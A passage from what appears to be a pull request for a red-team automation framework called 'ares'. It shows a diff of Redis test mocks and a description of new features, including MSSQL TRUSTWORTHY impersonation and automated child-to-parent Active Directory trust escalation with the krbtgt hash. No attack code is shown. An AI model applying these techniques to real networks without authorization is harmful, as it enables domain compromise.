             elif call_count == 3:
                 raise ConnectionError("Error 2")
             else:
-                yield b"ares:operation:test-op:state"
+                yield "ares:operation:test-op:state"
 
         mock_client.scan_iter = mock_scan_iter
 
@@ -668,7 +678,7 @@ class TestDiscoverActiveOperationConnectionReuse:
         mock_client, _redis_patch = mock_redis_setup
 
         now = datetime.now(timezone.utc)
-        recent_time = (now - timedelta(seconds=30)).isoformat().encode()
+        recent_time = (now - timedelta(seconds=30)).isoformat()
         mock_client.get = AsyncMock(return_value=recent_time)
 
         iteration_count = 0
@@ -677,7 +687,7 @@ class TestDiscoverActiveOperationConnectionReuse:
             nonlocal iteration_count
             iteration_count += 1
             if iteration_count >= 3:
-                yield b"ares:operation:test-op:state"
+                yield "ares:operation:test-op:state"
 
         mock_client.scan_iter = mock_scan_iter
 
@@ -705,7 +715,7 @@ class TestDiscoverActiveOperationConnectionReuse:
         mock_client, _redis_patch = mock_redis_setup
 
         now = datetime.now(timezone.utc)
-        recent_time = (now - timedelta(seconds=30)).isoformat().encode()
+        recent_time = (now - timedelta(seconds=30)).isoformat()
         mock_client.get = AsyncMock(return_value=recent_time)
 
         error_count = 0
@@ -715,7 +725,7 @@ class TestDiscoverActiveOperationConnectionReuse:
             error_count += 1
             if error_count == 1:
                 raise ConnectionError("Connection lost")
-            yield b"ares:operation:test-op:state"
+            yield "ares:operation:test-op:state"
 
         mock_client.scan_iter = mock_scan_iter
 


### PR DESCRIPTION
**Key Changes:**

- Introduced Redis Sentinel support with new connection helpers
- Implemented persistent task status tracking in Redis for debugging and reporting
- Enhanced MSSQL workflow with TRUSTWORTHY database impersonation and database-level escalation
- Automated detection and exploitation of child-to-parent AD trust escalation via krbtgt hash

**Added:**

- Redis Sentinel connection logic via `create_redis_client` and `get_redis_sentinel_config` in `src/ares/core/redis_client.py`, with options for socket timeouts and health checks
- Persistent task status storage (`set_task_status`) in `RedisTaskQueue`, including task lifecycle and error details
- New Taskfile commands for multi-agent task status/reporting: `ares:red:multi:report`, `ares:red:multi:tasks:running`, `ares:red:multi:tasks:list`
- MSSQL tool: `mssql_execute_as_user` for database-level impersonation using `EXECUTE AS USER`, supporting TRUSTWORTHY scenarios
- Logic to collect domains and select appropriate credentials for domain trust attacks in credential expansion and exploitation workflows
- Test coverage for Redis Sentinel logic in `tests/test_redis_client.py`

**Changed:**

- All Redis client usages now go through the new `create_redis_client`, supporting both direct and Sentinel connections throughout dispatcher, recovery, worker, and task queue modules
- Agent workers and dispatcher now record detailed task status in Redis, including operation ID, pod, role, error, timestamps, and payload snapshot
- Lateral movement and vulnerability exploitation routines now automatically detect and handle AD trust attacks using krbtgt hash, including child-to-parent escalation with credential selection
- MSSQL enumeration tool now detects TRUSTWORTHY databases and recommends impersonation paths
- Vulnerability discovery and exploitation logic refactored for extensibility and new attack paths (e.g., database-level impersonation, trust escalation)
- Taskfile routines for restarting workloads now include both deployments and statefulsets for comprehensive agent restarts

**Removed:**

- Direct Redis connection logic from worker, dispatcher, and recovery modules (now all use central helper)
- Redundant or implicit fallback code for credential and hash resolution during lateral movement (now more explicit and robust)